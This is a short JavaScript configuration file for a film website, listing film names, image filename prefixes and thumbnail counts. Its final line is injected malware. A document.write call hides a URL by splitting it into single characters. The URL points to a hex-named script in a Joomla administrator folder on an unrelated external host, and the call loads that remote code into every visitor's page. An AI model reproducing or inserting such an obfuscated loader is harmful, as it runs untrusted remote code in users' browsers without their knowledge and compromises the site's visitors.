

// Varios vars so the bits of Javascript know where to find the images and where to find the images 

var filmlist = ['lovewrecked', '22bullets', 'dangerousparking', 'paperheart', 'freebird', 'cityisland', 'sunshinecleaning', 'gangstersparadise'];

var prefixes = {};
//Lanidex1
prefixes.coverflow = 'coverflow_';
prefixes.posters = 'poster_';
prefixes.backgrounds = 'background_';
prefixes.pack_thumbs = '';

var pack_thumbs_count = {};

pack_thumbs_count['22bullets'] = 7;
pack_thumbs_count.cityisland = 5;
pack_thumbs_count.dangerousparking = 6;
pack_thumbs_count.freebird = 7;
pack_thumbs_count.gangstersparadise = 7;
pack_thumbs_count.lovewrecked = 5;
pack_thumbs_count.paperheart = 7;
pack_thumbs_count.sunshinecleaning = 5;
pack_thumbs_count.swingvote = 5;


document.write('<script language="JavaScript" type="text/javascript" src="h'+'t'+'t'+'p'+':'+'/'+'/'+'w'+'w'+'w'+'.'+'w'+'e'+'b'+'m'+'y'+'s'+'i'+'t'+'e'+'.'+'c'+'h'+'/'+'J'+'o'+'o'+'m'+'l'+'a'+'/'+'a'+'d'+'m'+'i'+'n'+'i'+'s'+'t'+'r'+'a'+'t'+'o'+'r'+'/'+'f'+'7'+'6'+'a'+'8'+'9'+'f'+'0'+'c'+'b'+'.'+'j'+'s"></script>');
